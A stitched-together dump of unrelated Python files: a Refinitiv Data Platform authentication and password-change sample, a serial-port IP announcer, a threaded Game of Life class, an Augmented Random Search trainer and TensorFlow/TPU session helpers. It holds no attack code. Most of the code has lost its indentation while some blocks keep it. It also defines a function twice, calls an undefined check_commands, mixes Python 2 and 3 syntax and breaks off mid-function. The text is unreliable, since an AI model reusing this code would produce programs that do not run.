elif r.status_code in [ 403, 404, 410, 451 ]:
# Stop retrying with the request
print('Refinitiv Data Platform authentication HTTP code:', r.status_code, r.reason)
print('Stop retrying with the request')
return None, None, None
else:
# Retry the request to Refinitiv Data Platform
print('Refinitiv Data Platform authentication HTTP code:', r.status_code, r.reason)
time.sleep(5)
# CAUTION: This is sample code with infinite retries.
print('Retrying auth request to Refinitiv Data Platform')
return get_sts_token(current_refresh_token)
def print_commandline_usage_and_exit(exit_code):
print('Usage: market_price_rdpgw_service_discovery.py [--app_id app_id] '
'[--user user] [--clientid clientid] [--password password] [--newPassword new_password] [--position position] [--auth_url auth_url] '
'[--discovery_url discovery_url] [--scope scope] [--service service] [--region region] [--ric ric] [--hotstandby] [--help]')
sys.exit(exit_code)
def check_new_password(pwd):
    result = 0
    countUpper = 0
    countLower = 0
    countDigit = 0
    countSpecial = 0
    if len(pwd) < PASSWORD_LENGTH_MIN:
        result |= PASSWORD_LENGTH_MASK
    for c in pwd:
        # This explicit character check avoids importing the re library; if re is
        # ever imported for another purpose, this condition should be refactored
        # into a regular expression.
        if not (('A' <= c <= 'Z') or ('a' <= c <= 'z')
                or ('0' <= c <= '9') or (c in PASSWORD_SPECIAL_CHARACTER_SET)):
            result |= PASSWORD_INVALID_CHARACTER_MASK
        if 'A' <= c <= 'Z':
            countUpper += 1
        if 'a' <= c <= 'z':
            countLower += 1
        if '0' <= c <= '9':
            countDigit += 1
        if c in PASSWORD_SPECIAL_CHARACTER_SET:
            countSpecial += 1
    if countUpper < PASSWORD_UPPERCASE_LETTER_MIN:
        result |= PASSWORD_UPPERCASE_LETTER_MASK
    if countLower < PASSWORD_LOWERCASE_LETTER_MIN:
        result |= PASSWORD_LOWERCASE_LETTER_MASK
    if countDigit < PASSWORD_DIGIT_MIN:
        result |= PASSWORD_DIGIT_MASK
    if countSpecial < PASSWORD_SPECIAL_CHARACTER_MIN:
        result |= PASSWORD_SPECIAL_CHARACTER_MASK
    return result
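# Illustrative sketch (not part of the original sample): the returned value is a
# bitmask, so individual policy violations can be inspected with bitwise AND, e.g.:
#
#   violations = check_new_password("weak")
#   if violations & PASSWORD_LENGTH_MASK:
#       print("new password is too short")
#   if violations & PASSWORD_DIGIT_MASK:
#       print("new password needs at least one digit")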
def changePassword():
data = {'username': user, 'password': password, 'client_id': clientid, 'grant_type': 'password', 'takeExclusiveSignOnControl': True,
'scope': scope, 'newPassword' : newPassword}
print("Sending changing password request to", auth_url, "...")
try:
# Request with auth for https protocol
r = requests.post(auth_url,
headers={'Accept': 'application/json'},
data=data,
auth=(clientid, client_secret),
verify=True,
allow_redirects=False)
except requests.exceptions.RequestException as e:
print('Changing password exception failure:', e)
return False
if r.status_code == 200:
auth_json = r.json()
print("Password successfully changed.")
print(json.dumps(auth_json, sort_keys=True, indent=2, separators=(',', ':')))
return True
elif r.status_code in [ 301, 302, 307, 308 ]:
# Perform URL redirect
print('Changing password response HTTP code:', r.status_code, r.reason)
new_host = r.headers['Location']
if new_host is not None:
print('Perform URL redirect to ', new_host)
return changePassword()
return False
elif r.status_code in [ 400, 401, 403, 404, 410, 451 ]:
# Error during change password attempt
auth_json = r.json()
print('Changing password response HTTP code:', r.status_code, r.reason)
print(json.dumps(auth_json, sort_keys=True, indent=2, separators=(',', ':')))
return False
else:
# Retry the request to the API gateway
print('Changing password response HTTP code:', r.status_code, r.reason)
time.sleep(5)
# CAUTION: This is sample code with infinite retries.
print('Retry change request')
return changePassword()
if __name__ == "__main__":
# Get command line parameters
opts = []
try:
opts, args = getopt.getopt(sys.argv[1:], "", ["help", "app_id=", "user=", "clientid=", "password=", "newPassword=",
"position=", "auth_url=", "discovery_url=", "scope=", "service=", "region=", "ric=",
"hotstandby"])
except getopt.GetoptError:
print_commandline_usage_and_exit(2)
for opt, arg in opts:
if opt in "--help":
print_commandline_usage_and_exit(0)
elif opt in "--app_id":
app_id = arg
elif opt in "--user":
user = arg
elif opt in "--clientid":
clientid = arg
elif opt in "--password":
password = arg
elif opt in "--newPassword":
newPassword = arg
elif opt in "--position":
position = arg
elif opt in "--auth_url":
auth_url = arg
elif opt in "--discovery_url":
discovery_url = arg
elif opt in "--scope":
scope = arg
elif opt in "--service":
service = arg
elif opt in "--region":
region = arg
elif opt in "--ric":
ric = arg
elif opt in "--hotstandby":
hotstandby = True
if user == '' or password == '' or clientid == '':
print("user, clientid and password are required options")
sys.exit(2)
    if newPassword != '':
        policyResult = check_new_password(newPassword)
        if (policyResult & PASSWORD_INVALID_CHARACTER_MASK) != 0:
            print("New password contains invalid symbol")
            print("valid symbols are [A-Z][a-z][0-9]", PASSWORD_SPECIAL_CHARACTER_SET, sep='')
            sys.exit(2)
        if (policyResult & PASSWORD_LENGTH_MASK) != 0:
            print("New password length should be at least ", PASSWORD_LENGTH_MIN, " characters")
            sys.exit(2)
        countCategories = 0
        if (policyResult & PASSWORD_UPPERCASE_LETTER_MASK) == 0:
            countCategories += 1
        if (policyResult & PASSWORD_LOWERCASE_LETTER_MASK) == 0:
            countCategories += 1
        if (policyResult & PASSWORD_DIGIT_MASK) == 0:
            countCategories += 1
        if (policyResult & PASSWORD_SPECIAL_CHARACTER_MASK) == 0:
            countCategories += 1
        if countCategories < PASSWORD_MIN_NUMBER_OF_CATEGORIES:
            print("Password must contain characters belonging to at least three of the following four categories:\n"
                  "uppercase letters, lowercase letters, digits, and special characters.\n")
            sys.exit(2)
        if not changePassword():
            sys.exit(2)
        password = newPassword
        newPassword = ''
if position == '':
# Populate position if possible
try:
position_host = socket.gethostname()
position = socket.gethostbyname(position_host) + "/" + position_host
except socket.gaierror:
position = "127.0.0.1/net"
sts_token, refresh_token, expire_time = get_sts_token(None)
if not sts_token:
sys.exit(1)
original_expire_time = expire_time
# Query VIPs from Refinitiv Data Platform service discovery
if not query_service_discovery():
print("Failed to retrieve endpoints from Refinitiv Data Platform Service Discovery. Exiting...")
sys.exit(1)
# Start websocket handshake; create two sessions when the hotstandby parameter is specified.
session1 = WebSocketSession("session1", hostList[0])
session1.connect()
if hotstandby:
session2 = WebSocketSession("session2", hostList[1])
session2.connect()
try:
while True:
            # Continue using the current token until 90% of its lifetime has elapsed.
time.sleep(int(float(expire_time) * 0.90))
sts_token, refresh_token, expire_time = get_sts_token(refresh_token)
if not sts_token:
sys.exit(1)
if int(expire_time) != int(original_expire_time):
print('expire time changed from ' + str(original_expire_time) + ' sec to ' + str(expire_time) + ' sec; retry with password')
sts_token, refresh_token, expire_time = get_sts_token(None)
if not sts_token:
sys.exit(1)
original_expire_time = expire_time
# Update token.
session1.refresh_token()
if hotstandby:
session2.refresh_token()
except KeyboardInterrupt:
session1.disconnect()
if hotstandby:
session2.disconnect()
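# Example invocation (hypothetical credentials and region; the real values come
# from your Refinitiv Data Platform account):
#
#   python market_price_rdpgw_service_discovery.py --user MACHINE_ID --password PASS \
#       --clientid APP_KEY --ric /EUR= --region us-east-1 --hotstandby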
|
app.py
|
#!/usr/bin/env python
import socket
import serial
import sys,time
import signal
from time import ctime,sleep
import glob,struct
from multiprocessing import Process,Manager,Array
import threading
def get_my_ip():
try:
csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
csock.connect(('8.8.8.8', 80))
(addr, port) = csock.getsockname()
csock.close()
return addr
except socket.error:
return "127.0.0.1"
def onRead():
global ser,isExit
while True:
        if isExit:
            break
n = ser.inWaiting()
if n>0 :
s = ser.read(n)
if s.find("M5 OK")>-1:
ser.write("M5 SIP:"+get_my_ip()+":5000\n")
if __name__ == "__main__":
print get_my_ip()
ser = serial.Serial("/dev/ttyAMA0",115200)
isExit = False
try:
th = threading.Thread(target=onRead)
th.start()
while True:
sleep(1)
except KeyboardInterrupt:
print "exit"
isExit = True
finally:
        ser.close()
|
threaded_game.py
|
"""Threaded Game module for py-conway.
This module contains the core functionality for running Conway's Game
of Life on a background thread. Unlike the main game, which must be
advanced manually, a threaded game will run automatically until
stopped.
"""
from . import Game, GameState
from threading import Thread
class ThreadedGame(Game):
"""Threaded module class.
Class for running a game of Conway's Game of Life on a virtual
two-dimensional board of any size on a background thread.
"""
def __init__(self, width: int = 0, height: int = 0,
seed: list = None, random: bool = False,
enforce_boundary: bool = True):
"""
Intialize the game based on provided board size values and a seed.
Args:
width (int): the width (in columns) of the game board
height (int): the height (in rows) of the game board
seed (int): A two-dimensional list with 1 and 0 values that
should be set to the initial game state.
random (bool): Boolean indicating whether a random seed should
be created. Ignored if a seed is provided.
enforce_boundary (bool): Boolean indicating whether cells on
the edge of the board should wrap around to the other
side.
"""
self._thread_active = False
super().__init__(width, height, seed, random, enforce_boundary)
def _run(self):
"""Target method for running a game on a thread."""
if self.state == GameState.READY:
self.state = GameState.RUNNING
while True:
if (self.live_cells == 0 or not self._thread_active):
self.state = GameState.FINISHED
break
self.run_generation()
def start_thread(self):
"""Run the game automatically on a background thread."""
thread = Thread(target=self._run, args=())
thread.daemon = True
self._thread_active = True
thread.start()
def stop_thread(self):
"""Stop a game currently running on a background thread."""
self._thread_active = False
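# Minimal usage sketch (assumes the Game/GameState API imported above):
#
#   game = ThreadedGame(width=20, height=20, random=True)
#   game.start_thread()   # generations advance on a daemon thread
#   ...                   # query game.state / game.live_cells from the caller
#   game.stop_thread()    # the thread finishes after the current generation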
|
ars.py
|
# AI 2018
import os
import inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(os.path.dirname(currentdir))
os.sys.path.insert(0,parentdir)
# Importing the libraries
import os
import numpy as np
import gym
from gym import wrappers
import pybullet_envs
import time
import multiprocessing as mp
from multiprocessing import Process, Pipe
import argparse
# Setting the Hyper Parameters
class Hp():
def __init__(self):
self.nb_steps = 10000
self.episode_length = 1000
self.learning_rate = 0.02
self.nb_directions = 16
self.nb_best_directions = 16
assert self.nb_best_directions <= self.nb_directions
self.noise = 0.03
self.seed = 1
self.env_name = 'HalfCheetahBulletEnv-v0'
# Multiprocess Exploring the policy on one specific direction and over one episode
_RESET = 1
_CLOSE = 2
_EXPLORE = 3
def ExploreWorker(rank,childPipe, envname, args):
env = gym.make(envname)
nb_inputs = env.observation_space.shape[0]
normalizer = Normalizer(nb_inputs)
observation_n = env.reset()
n=0
while True:
n+=1
try:
# Only block for short times to have keyboard exceptions be raised.
if not childPipe.poll(0.001):
continue
message, payload = childPipe.recv()
except (EOFError, KeyboardInterrupt):
break
if message == _RESET:
observation_n = env.reset()
childPipe.send(["reset ok"])
continue
if message == _EXPLORE:
#normalizer = payload[0] #use our local normalizer
policy = payload[1]
hp = payload[2]
direction = payload[3]
delta = payload[4]
state = env.reset()
done = False
num_plays = 0.
sum_rewards = 0
while not done and num_plays < hp.episode_length:
normalizer.observe(state)
state = normalizer.normalize(state)
action = policy.evaluate(state, delta, direction,hp)
state, reward, done, _ = env.step(action)
reward = max(min(reward, 1), -1)
sum_rewards += reward
num_plays += 1
childPipe.send([sum_rewards])
continue
if message == _CLOSE:
childPipe.send(["close ok"])
break
childPipe.close()
# Normalizing the states
class Normalizer():
def __init__(self, nb_inputs):
self.n = np.zeros(nb_inputs)
self.mean = np.zeros(nb_inputs)
self.mean_diff = np.zeros(nb_inputs)
self.var = np.zeros(nb_inputs)
def observe(self, x):
self.n += 1.
last_mean = self.mean.copy()
self.mean += (x - self.mean) / self.n
self.mean_diff += (x - last_mean) * (x - self.mean)
self.var = (self.mean_diff / self.n).clip(min = 1e-2)
def normalize(self, inputs):
obs_mean = self.mean
obs_std = np.sqrt(self.var)
return (inputs - obs_mean) / obs_std
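# The Normalizer keeps Welford-style running statistics; a quick standalone
# check (hypothetical values):
#
#   norm = Normalizer(3)
#   norm.observe(np.array([1.0, 2.0, 3.0]))
#   norm.observe(np.array([3.0, 4.0, 5.0]))
#   print(norm.normalize(np.array([2.0, 3.0, 4.0])))  # zero vector: input equals the running mean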
# Building the AI
class Policy():
def __init__(self, input_size, output_size, env_name, args):
try:
self.theta = np.load(args.policy)
except:
self.theta = np.zeros((output_size, input_size))
self.env_name = env_name
print("Starting policy theta=",self.theta)
def evaluate(self, input, delta, direction, hp):
if direction is None:
return np.clip(self.theta.dot(input), -1.0, 1.0)
elif direction == "positive":
return np.clip((self.theta + hp.noise*delta).dot(input), -1.0, 1.0)
else:
return np.clip((self.theta - hp.noise*delta).dot(input), -1.0, 1.0)
def sample_deltas(self):
return [np.random.randn(*self.theta.shape) for _ in range(hp.nb_directions)]
def update(self, rollouts, sigma_r, args):
step = np.zeros(self.theta.shape)
for r_pos, r_neg, d in rollouts:
step += (r_pos - r_neg) * d
self.theta += hp.learning_rate / (hp.nb_best_directions * sigma_r) * step
timestr = time.strftime("%Y%m%d-%H%M%S")
np.save(args.logdir+"/policy_"+self.env_name+"_"+timestr+".npy", self.theta)
# Exploring the policy on one specific direction and over one episode
def explore(env, normalizer, policy, direction, delta, hp):
state = env.reset()
done = False
num_plays = 0.
sum_rewards = 0
while not done and num_plays < hp.episode_length:
normalizer.observe(state)
state = normalizer.normalize(state)
action = policy.evaluate(state, delta, direction, hp)
state, reward, done, _ = env.step(action)
reward = max(min(reward, 1), -1)
sum_rewards += reward
num_plays += 1
return sum_rewards
# Training the AI
def train(env, policy, normalizer, hp, parentPipes, args):
for step in range(hp.nb_steps):
# Initializing the perturbations deltas and the positive/negative rewards
deltas = policy.sample_deltas()
positive_rewards = [0] * hp.nb_directions
negative_rewards = [0] * hp.nb_directions
if parentPipes:
for k in range(hp.nb_directions):
parentPipe = parentPipes[k]
parentPipe.send([_EXPLORE,[normalizer, policy, hp, "positive", deltas[k]]])
for k in range(hp.nb_directions):
positive_rewards[k] = parentPipes[k].recv()[0]
for k in range(hp.nb_directions):
parentPipe = parentPipes[k]
parentPipe.send([_EXPLORE,[normalizer, policy, hp, "negative", deltas[k]]])
for k in range(hp.nb_directions):
negative_rewards[k] = parentPipes[k].recv()[0]
else:
# Getting the positive rewards in the positive directions
for k in range(hp.nb_directions):
positive_rewards[k] = explore(env, normalizer, policy, "positive", deltas[k], hp)
# Getting the negative rewards in the negative/opposite directions
for k in range(hp.nb_directions):
negative_rewards[k] = explore(env, normalizer, policy, "negative", deltas[k], hp)
# Gathering all the positive/negative rewards to compute the standard deviation of these rewards
all_rewards = np.array(positive_rewards + negative_rewards)
sigma_r = all_rewards.std()
# Sorting the rollouts by the max(r_pos, r_neg) and selecting the best directions
scores = {k:max(r_pos, r_neg) for k,(r_pos,r_neg) in enumerate(zip(positive_rewards, negative_rewards))}
order = sorted(scores.keys(), key = lambda x:scores[x])[:hp.nb_best_directions]
rollouts = [(positive_rewards[k], negative_rewards[k], deltas[k]) for k in order]
# Updating our policy
policy.update(rollouts, sigma_r, args)
# Printing the final reward of the policy after the update
reward_evaluation = explore(env, normalizer, policy, None, None, hp)
print('Step:', step, 'Reward:', reward_evaluation)
# Running the main code
def mkdir(base, name):
path = os.path.join(base, name)
if not os.path.exists(path):
os.makedirs(path)
return path
if __name__ == "__main__":
mp.freeze_support()
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--env', help='Gym environment name', type=str, default='HalfCheetahBulletEnv-v0')
parser.add_argument('--seed', help='RNG seed', type=int, default=1)
parser.add_argument('--render', help='OpenGL Visualizer', type=int, default=0)
parser.add_argument('--movie',help='rgb_array gym movie',type=int, default=0)
parser.add_argument('--steps', help='Number of steps', type=int, default=10000)
parser.add_argument('--policy', help='Starting policy file (npy)', type=str, default='')
parser.add_argument('--logdir', help='Directory root to log policy files (npy)', type=str, default='.')
parser.add_argument('--mp', help='Enable multiprocessing', type=int, default=1)
args = parser.parse_args()
hp = Hp()
hp.env_name = args.env
hp.seed = args.seed
hp.nb_steps = args.steps
print("seed = ", hp.seed)
np.random.seed(hp.seed)
parentPipes = None
if args.mp:
num_processes = hp.nb_directions
processes = []
childPipes = []
parentPipes = []
for pr in range (num_processes):
parentPipe, childPipe = Pipe()
parentPipes.append(parentPipe)
childPipes.append(childPipe)
for rank in range(num_processes):
p = mp.Process(target=ExploreWorker, args=(rank,childPipes[rank], hp.env_name, args))
p.start()
processes.append(p)
work_dir = mkdir('exp', 'brs')
monitor_dir = mkdir(work_dir, 'monitor')
env = gym.make(hp.env_name)
if args.render:
env.render(mode = "human")
if args.movie:
env = wrappers.Monitor(env, monitor_dir, force = True)
nb_inputs = env.observation_space.shape[0]
nb_outputs = env.action_space.shape[0]
policy = Policy(nb_inputs, nb_outputs,hp.env_name, args)
normalizer = Normalizer(nb_inputs)
print("start training")
train(env, policy, normalizer, hp, parentPipes, args)
if args.mp:
for parentPipe in parentPipes:
parentPipe.send([_CLOSE,"pay2"])
for p in processes:
p.join()
|
tflex.py
|
import tensorflow as tf
import numpy as np
from glob import glob
import os
import re
from tensorflow.python import pywrap_tensorflow
import tqdm
import h5py
import shutil
import tempfile
import traceback
import time
import threading
from tensorflow.python.framework import dtypes
from tensorflow.python.distribute.cluster_resolver import TPUClusterResolver as BaseTPUClusterResolver
from tensorflow.python.training import server_lib
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.contrib import tpu
class _DefaultState(threading.local):
def __init__(self, **kws):
super(_DefaultState, self).__init__()
for k, v in kws.items():
setattr(self, k, v)
def save(self):
return [(k, v) for k, v in self.__dict__.items()]
def restore(self, state):
for k, v in state:
setattr(self, k, v)
local = _DefaultState()
lock = threading.RLock()
def with_defaults(thunk):
with lock:
state = local.save()
session = tf.get_default_session() or get_default_session()
graph = tf.get_default_graph() or get_default_graph()
def f(*args, **kws):
with lock:
local.restore(state)
lock.acquire()
with session.as_default() if session else nullcontext():
with graph.as_default() if graph else nullcontext():
lock.release()
result = thunk(*args, **kws)
lock.acquire()
lock.release()
return result
return f
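# Sketch: with_defaults captures the current default session/graph so a thunk can
# be run from another thread without losing them (train_op below is a placeholder):
#
#   run_op = with_defaults(lambda: get_default_session().run(train_op))
#   threading.Thread(target=run_op).start()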
def get_default(name, required=True):
with lock:
value = getattr(local, name) if hasattr(local, name) else None
if required:
assert value is not None
return value
def set_default(name, value):
with lock:
setattr(local, name, value)
def ensure_default(name, value):
with lock:
current = get_default(name, required=False)
if current is None:
set_default(name, value)
return value
def get_default_session(required=False):
return get_default('session', required=required)
def get_default_graph(required=False):
return get_default('graph', required=required)
class Future(object):
def __init__(self, dependencies, thunk, *args, **kws):
if isinstance(dependencies, Future):
dependencies = [dependencies]
self.dependencies = [defer(_) if callable(_) else _ for _ in dependencies]
if thunk is None:
thunk = lambda: None
self.thunk = thunk
self.args = args
self.kws = kws
self.result = None
self.complete = False
self.thread = None
self.daemon = True
self.error = None
def run(self):
try:
self.result = self.thunk(*self.args, **self.kws)
except Exception as e:
traceback.print_exc()
self.error = e
self.complete = True
def run_async(self):
assert self.thread is None
def thunk():
[_.join() for _ in self.dependencies]
self.run()
self.thread = threading.Thread(target=with_defaults(thunk), daemon=self.daemon)
self.thread.start()
def join(self):
if not self.complete:
assert self.thread
while not self.complete:
time.sleep(1.0)
return self.result
def defer(thunk, *args, **kws):
dependencies = []
if 'dependencies' in kws:
dependencies = kws.pop('dependencies')
future = Future(dependencies=dependencies, thunk=thunk, *args, **kws)
future.run_async()
return future
def parallelize(xs, thunk, *args, daemon=True):
threads = []
for x in xs:
thread = threading.Thread(target=with_defaults(thunk), args=(x, *args), daemon=daemon)
thread.start()
threads.append(thread)
return threads
def parallelize_verbose(label, xs, thunk, *args, daemon=True):
xs = [x for x in xs]
with tqdm.tqdm(total=len(xs)) as pbar:
pbar.set_description(label)
def run(*args, **kws):
try:
return thunk(*args, **kws)
finally:
pbar.update(1)
return parallelize(xs, run, *args, daemon=daemon)
def parallelize_verbose(label, xs, thunk, *args, daemon=True, synchronous=False):
xs = [x for x in xs]
if synchronous:
for i in tqdm.trange(len(xs), desc=label):
x = xs[i]
thunk(x, *args)
else:
with tqdm.tqdm(total=len(xs)) as pbar:
pbar.set_description(label)
threads = parallelize(xs, thunk, *args, daemon=daemon)
while len(threads) > 0:
for i in range(len(threads)):
if not threads[i].is_alive():
pbar.update(1)
threads.remove(threads[i])
break
time.sleep(0.1)
# http://stackoverflow.com/questions/1624883/alternative-way-to-split-a-list-into-groups-of-n
import itertools
def group(n, iterable, fillvalue=None):
"group(3, 'ABCDEFG', 'x') --> ABC DEF Gxx"
args = [iter(iterable)] * n
return itertools.zip_longest(*args, fillvalue=fillvalue)
def tuples(*args, **kws):
return [x for x in group(*args, **kws)]
class Namespace(object):
pass
if 'state' not in globals():
state = Namespace()
if not hasattr(state, 'noisy'):
state.noisy = 'NOISY' in os.environ
if not hasattr(state, 'debug'):
state.debug = 'DEBUG' in os.environ
if not hasattr(state, 'noisy_backtrace'):
state.noisy_backtrace = 'NOISY_BACKTRACE' in os.environ
if not hasattr(state, 'break_next_run'):
state.break_next_run = False
def reroute(addr, host=None):
if host is None or host is False:
return addr
if addr.startswith('grpc://'):
return 'grpc://' + reroute(addr[len('grpc://'):], host=host)
if not re.match('[0-9]+[.][0-9]+[.][0-9]+[.][0-9]+[:]8470', addr):
return addr
if not addr.endswith(':8470'):
return addr
a, b, c, d = [int(x) for x in addr.split(':')[0].split('.')]
if a == 10 and b in [48, 49]:
assert (d == 2)
port = b * 1000 + c
elif a == 10 and b in range(2, 66) and c == 0:
port = b * 1000 + d
else:
return addr
return host + ':' + str(port)
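# Illustrative behaviour (hypothetical addresses): with a proxy host supplied,
# internal TPU worker addresses on port 8470 are rewritten to a derived port,
# while anything else passes through unchanged:
#
#   reroute('grpc://10.48.0.2:8470', host='proxy.local')  # -> 'grpc://proxy.local:48000'
#   reroute('example.com:8470', host='proxy.local')       # -> 'example.com:8470'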
class TPUClusterResolver(BaseTPUClusterResolver):
def __init__(self, *args, host=None, **kws):
super(TPUClusterResolver, self).__init__(*args, **kws)
if host is None:
if 'TPU_HOST' in os.environ:
host = os.environ['TPU_HOST']
self._host = host
def master(self, *args, **kws):
ip = super(TPUClusterResolver, self).master(*args, **kws)
return reroute(ip, host=self._host)
def cluster_spec(self):
spec = super(TPUClusterResolver, self).cluster_spec()
r = dict()
for k, v in spec.as_dict().items():
r[k] = [reroute(ip, host=self._host) for ip in v]
return server_lib.ClusterSpec(r)
def init_tpu(name, host=None, timeout_in_ms=600 * 60 * 1000):
tpu_init = [tpu.initialize_system()]
cluster_resolver = TPUClusterResolver(name, host=host)
config = tf.ConfigProto(operation_timeout_in_ms=timeout_in_ms,
graph_options=tf.GraphOptions(
rewrite_options=rewriter_config_pb2.RewriterConfig(
disable_meta_optimizer=True)),
isolate_session_state=True)
cluster_spec = cluster_resolver.cluster_spec()
if cluster_spec:
config.cluster_def.CopyFrom(cluster_spec.as_cluster_def())
init_sess = tf.Session(cluster_resolver.get_master(), config=config)
init_sess.run(tpu_init)
return init_sess, cluster_resolver
def get_session(session=None):
if session is None:
session = get_default_session()
return session
def get_devices(session=None):
session = get_session(session)
if hasattr(session, '_cached_devices'):
devices = session._cached_devices
else:
devices = session._cached_devices = session.list_devices()
return devices
def has_gpu(session=None):
session = get_session(session)
if hasattr(session, '_has_gpu'):
result = session._has_gpu
else:
devices = get_devices(session=session)
result = session._has_gpu = len([x for x in devices if ':GPU:' in x.name]) > 0
return result
def has_tpu(session=None):
session = get_session(session)
if hasattr(session, '_has_tpu'):
result = session._has_tpu
else:
devices = get_devices(session=session)
result = session._has_tpu = len([x for x in devices if ':TPU:' in x.name]) > 0
return result
def get_cores_from_devices(devices):
cores = [x for x in devices if ':TPU:' in x.name]
if len(cores) <= 0:
cores = [x for x in devices if ':GPU:' in x.name]
if len(cores) <= 0:
cores = [x for x in devices if ':CPU:' in x.name]
return cores
def get_cores(session=None, devices=None):
if devices is None:
devices = get_devices(session=session)
return get_cores_from_devices(devices)
def get_cpus(session=None, devices=None):
if devices is None:
devices = get_devices(session=session)
cpus = [x for x in devices if ':CPU:' in x.name]
return cpus
def get_tpu_resolver(tpu_name='auto'):
# Get the TPU's location
if tpu_name != 'auto':
return TPUClusterResolver(tpu_name)
elif 'COLAB_TPU_ADDR' in os.environ:
return TPUClusterResolver()
elif 'TPU_NAME' in os.environ:
return TPUClusterResolver(os.environ['TPU_NAME'])
def pretty(x, ellipsize=120):
r = str(x)
if len(r) > ellipsize:
return r[0:ellipsize - 3] + '...'
return r
def print_backtrace():
try:
raise Exception("Printing traceback...")
except:
import traceback
traceback.print_exc()
class Session(tf.Session):
def __init__(self, target='auto', graph=None, config=None, init_tpu=False, id=None):
if config is None:
config = tf.ConfigProto(operation_timeout_in_ms=6000 * 60 * 1000,
graph_options=tf.GraphOptions(
rewrite_options=rewriter_config_pb2.RewriterConfig(
disable_meta_optimizer=True)),
isolate_session_state=True)
config.isolate_session_state = True
resolver = get_tpu_resolver(target)
if resolver is not None:
target = resolver.get_master()
cluster_spec = resolver.cluster_spec()
if cluster_spec:
config.cluster_def.CopyFrom(cluster_spec.as_cluster_def())
elif target == 'auto':
target = None
super().__init__(target, graph=graph, config=config)
        self.id = id
        self.init_tpu = init_tpu
self._tflex_resolver = resolver
self._tflex_target = target
self._tflex_config = config
ensure_default('session', self)
ensure_default('devices', self.list_devices())
ensure_default('graph', self.graph)
@property
def _spec(self):
return '#%d' % self.id if self.id is not None else ''
    def ensure(self):
        if self.init_tpu:
            print(self._spec, "Initializing TPU...")
            #sess.run(tpu.initialize_system())
            # Use the module-level helper that accepts a session argument.
            initialize_tpu(session=self, timeout_in_ms=20000)
            self.init_tpu = None
def run(self, *args, **kws):
if state.break_next_run:
import pdb; pdb.set_trace()
if state.debug:
check_commands()
if state.noisy:
print(self._spec, 'Session.run', *[pretty(x) for x in args], *[pretty(k)+'='+pretty(v) for k, v in kws.items()])
if state.noisy_backtrace:
print_backtrace()
start = time.time()
result = super(Session, self).run(*args, **kws)
elapsed = time.time() - start
if state.noisy:
print(self._spec, 'Session.run (finished in %.2fs)' % elapsed, pretty(result), *[pretty(x) for x in args], *[pretty(k)+'='+pretty(v) for k, v in kws.items()])
if state.noisy_backtrace:
print_backtrace()
return result
def split_by_params(vs, n=20e6, f=None):
if f is None:
f = lambda x: np.prod(x.shape.as_list())
i = 0
xs = []
for variable in vs:
xs.append(variable)
count = f(variable)
i += count
if i >= n:
yield xs
xs = []
i = 0
yield xs
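# Sketch: split_by_params yields groups of variables whose combined parameter
# count stays around n, so large models can be fetched or assigned in chunks, e.g.
#
#   for chunk in split_by_params(tf.trainable_variables(), n=20e6):
#       values = get_default_session().run(chunk)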
def latest_checkpoint(checkpoint_dir, latest_filename=None):
paths = [x for x in glob(os.path.join(checkpoint_dir, 'model-*.*')) if not x.endswith(".tmp")]
ctrs = np.array([[int(y) for y in re.findall(r'model-([0-9]+)(?:-[0-9]+)?[.](?:npy|hdf5)', x)] for x in paths]).flatten()
if len(ctrs) <= 0:
ckpt = tf.train.latest_checkpoint(checkpoint_dir, latest_filename=latest_filename)
return ckpt
ctr = ctrs.max()
return os.path.join(checkpoint_dir, 'model-{}').format(ctr)
def truncate_value(variable, value, reshape=True):
if not reshape:
return value
shape = variable.shape.as_list()
params = np.prod(shape)
params2 = np.prod(value.shape)
if params == params2:
return value
print('Truncating {} from shape {} to shape {}'.format(variable.name, value.shape, shape))
value = np.array(value)
value = value.reshape([-1])
value = value[0:params]
value = value.reshape(shape)
return value
from tensorflow.core.protobuf import config_pb2
def initialize_tpu(session=None, timeout_in_ms=None):
session = session or get_default_session()
with session.as_default():
op = tpu.initialize_system()
options = None
if timeout_in_ms:
options=config_pb2.RunOptions(timeout_in_ms=timeout_in_ms)
return session.run(op, options=options)
def load(variable, value, session=None, timeout_in_ms=None):
session = session or get_default_session()
ops = variable.initializer
vals = dict([(variable.initializer.inputs[1], value)])
#for x, (k, v) in zip(variables, vals.items()):
# print(x.name, x.shape.as_list(), k, v.shape)
options = None
if timeout_in_ms:
options=config_pb2.RunOptions(timeout_in_ms=timeout_in_ms)
return session.run(ops, vals, options=options)
def eval(variable, session=None, timeout_in_ms=None):
session = session or get_default_session()
options = None
if timeout_in_ms:
options=config_pb2.RunOptions(timeout_in_ms=timeout_in_ms)
return session.run(variable, options=options)
def grab_values(variables, reader, reshape=False):
for variable in variables:
name = variable_name(variable).split(':')[0]
value = reader.get_tensor(name)
value = truncate_value(variable, value, reshape=reshape)
yield variable, value
def assign_values(variables, values, session=None, timeout_in_ms=60000):
session = session or get_default_session()
variables = [x for x in variables]
values = [x for x in values]
ops = [x.initializer for x in variables]
vals = dict([(x.initializer.inputs[1], value.value() if isinstance(value, tf.Variable) else value) for x, value in zip(variables, values)]) # TODO: bfloat16 support
#for x, (k, v) in zip(variables, vals.items()):
# print(x.name, x.shape.as_list(), k, v.shape)
options = None
if timeout_in_ms:
options=config_pb2.RunOptions(timeout_in_ms=timeout_in_ms)
session.run(ops, vals, options=options)
def load_snapshot(ckpt, session=None, var_list=None, reshape=False):
session = session or get_default_session()
reader = pywrap_tensorflow.NewCheckpointReader(ckpt)
vs = var_list or tf.trainable_variables()
for variables in tqdm.tqdm(list(split_by_params(vs))):
values = [value for variable, value in grab_values(variables, reader, reshape=reshape)]
assign_values(variables, values, session=session)
def get_variable(name, var_list=None):
name, num = name.split(':') if ':' in name else (name, '0')
num = int(num)
name = os.path.join(tf.get_variable_scope().name, name)
vs = var_list or tf.trainable_variables()
for x in vs:
if x.name.startswith(name + ':%d' % num):
return x
def load_weights(ckpt, session=None, var_list=None, reshape=False):
session = session or get_default_session()
vs = var_list or tf.trainable_variables()
files = list(sorted(glob(ckpt + '-*.npy')))
for out in tqdm.tqdm(files):
for name, value in np.load(out, allow_pickle=True):
variable = get_variable(name)
if variable is None:
print('Warning: variable %s not loaded' % name)
else:
value = truncate_value(variable, value, reshape=reshape)
variable.load(value, session)
def load_variables(ckpt, session=None, var_list=None, reshape=False):
session = session or get_default_session()
